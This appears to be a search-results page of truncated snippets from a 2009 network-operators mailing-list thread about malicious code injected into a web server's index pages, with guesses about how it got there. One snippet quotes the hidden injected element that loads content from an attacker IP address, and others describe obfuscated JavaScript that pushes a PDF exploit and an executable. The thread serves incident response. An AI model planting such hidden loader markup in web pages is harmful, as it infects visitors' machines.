On 21/04/2009, at 5:23 AM, Mike Lewinski wrote:
Paul Ferguson wrote:
Most likely SQL injection. At any given time, there are hundreds of
thousands of "legitimate" websites out there that are unwittingly
harboring
malicious code.
Most of the MS-SQL injection attacks we see write malicious
> Date: Mon, 20 Apr 2009 10:52:57 -0700
> From: Paul Ferguson
>
> On Mon, Apr 20, 2009 at 10:40 AM, Nick Chapman
> wrote:
>
> > On Mon, Apr 20, 2009 at 12:47 PM, Neil wrote:
>
> >>
> >> But if you figure out how they got write access to a static website, I'd
> >> love to hear it.
> >
> >
> >
: Mike Lewinski [mailto:m...@rockynet.com]
Sent: Monday, April 20, 2009 11:23 AM
To: nanog@nanog.org
Subject: Re: Malicious code just found on web server
Paul Ferguson wrote:
> Most likely SQL injection. At any given time, there are hundreds of
> thousands of "legitimate" website
Ingo Flaschberger wrote:
Hi,
I see this every day at my webservers with a lot of *outdated*
*exploitable* customer websites [I love old joomla's];
but mod_security does a great job nuking sql and various other exploits.
mod_security saves our collective behinds every day at nearly every very
Hi,
I see this every day at my webservers with a lot of *outdated*
*exploitable* customer websites [I love old joomla's];
but mod_security does a great job nuking sql and various other exploits.
Kind regards,
Ingo Flaschberger
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
On Mon, Apr 20, 2009 at 10:40 AM, Nick Chapman
wrote:
> On Mon, Apr 20, 2009 at 12:47 PM, Neil wrote:
>>
>> But if you figure out how they got write access to a static website, I'd
>> love to hear it.
>
>
> Compromised FTP credentials would be my g
Mike Lewinski wrote:
Paul Ferguson wrote:
Most likely SQL injection. At any given time, there are hundreds of
thousands of "legitimate" websites out there that are unwittingly
harboring
malicious code.
Most of the MS-SQL injection attacks we see write malicious javascript
into the DB itsel
On Mon, Apr 20, 2009 at 12:47 PM, Neil wrote:
> I've run into this sort of attack before, where they change the page to load
> content from elsewhere; but I couldn't figure out how they managed to write
> to the sites' pages. They were hosted on a commercial webhost, and so if it
> was a comprom
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
On Mon, Apr 20, 2009 at 10:23 AM, Mike Lewinski wrote:
> Paul Ferguson wrote:
>
>> Most likely SQL injection. At any given time, there are hundreds of
>> thousands of "legitimate" websites out there that are unwittingly
>> harboring
>> malicious code
Paul Ferguson wrote:
Most likely SQL injection. At any given time, there are hundreds of
thousands of "legitimate" websites out there that are unwittingly harboring
malicious code.
Most of the MS-SQL injection attacks we see write malicious javascript
into the DB itself so all query results i
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
On Mon, Apr 20, 2009 at 9:47 AM, Neil wrote:
> I've run into this sort of attack before, where they change the page to
> load content from elsewhere; but I couldn't figure out how they managed
> to write to the sites' pages. They were hosted on a co
On Fri, Apr 17, 2009 at 4:39 PM, Russell Berg wrote:
> We just discovered what we suspect is malicious code appended to all
> index.html files on our web server as of the 11:00 central time hour today:
>
> src="http://77.92.158.122/webmail/inc/web/index.php";
> style="display: none;" height="0" w
On Mon, Apr 20, 2009 at 10:42 AM, Jake Mailinglists
wrote:
> Paul,
> I noticed that in the PDF file but as the domain doesn't seem to have
> resolution I didn't mention it.
>
> Jake
>
> WHOIS information on the domain
>
> Whois Record
>
> domain: TEST1.RU
> type: CORPORATE
> nserver:
Paul,
I noticed that in the PDF file but as the domain doesn't seem to have
resolution I didn't mention it.
Jake
WHOIS information on the domain
Whois Record
domain: TEST1.RU
type: CORPORATE
nserver:ns1.centerhost.ru.
nserver:ns1.cetis.ru.
state: REGISTERED, DELEGATED
org
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills wrote:
>> I took a quick look at the code... formatted it in a pastebin here:
>> http://pastebin.com/m7b50be54
>>
>> That javascript writes this to the page (URL obscured):
>> document.write("> src=\"hXX
Nice, bad code is actually on all of the error (404) pages for the site as
well as some other php pages.
The code is actually a base64 obfuscation technique to hide the actual
attack code.
Once decode the code attempts multiple attacks to try and get the victim to
download an executable
hxxp://
You beat me to it.
-ChrisAM
On Fri, Apr 17, 2009 at 6:31 PM, Paul Ferguson wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> On Fri, Apr 17, 2009 at 3:15 PM, Paul Ferguson
> wrote:
>
>>
>> On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills
>> wrote:
>>
>>> I took a quick look at the code.
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
On Fri, Apr 17, 2009 at 3:15 PM, Paul Ferguson
wrote:
>
> On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills
> wrote:
>
>> I took a quick look at the code... formatted it in a pastebin here:
>> http://pastebin.com/m7b50be54
>>
>> That javascript writes th
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills wrote:
> I took a quick look at the code... formatted it in a pastebin here:
> http://pastebin.com/m7b50be54
>
> That javascript writes this to the page (URL obscured):
> document.write(" src=\"hXXp://77.9
I took a quick look at the code... formatted it in a pastebin here:
http://pastebin.com/m7b50be54
That javascript writes this to the page (URL obscured):
document.write("");
The 1.2.3.4 in the URL is my public IP address (I changed that).
Below the javascript, it grabs a PDF:
That PDF is on th
FWIW, 77.92.158.122 resolves to mail.yarisfest.com, not mail.yaris.com
-Original Message-
From: Russell Berg
Sent: Friday, April 17, 2009 3:39 PM
To: 'nanog@nanog.org'
Subject: Malicious code just found on web server
We just discovered what we suspect is malicious code appended to all in
21 matches
Mail list logo
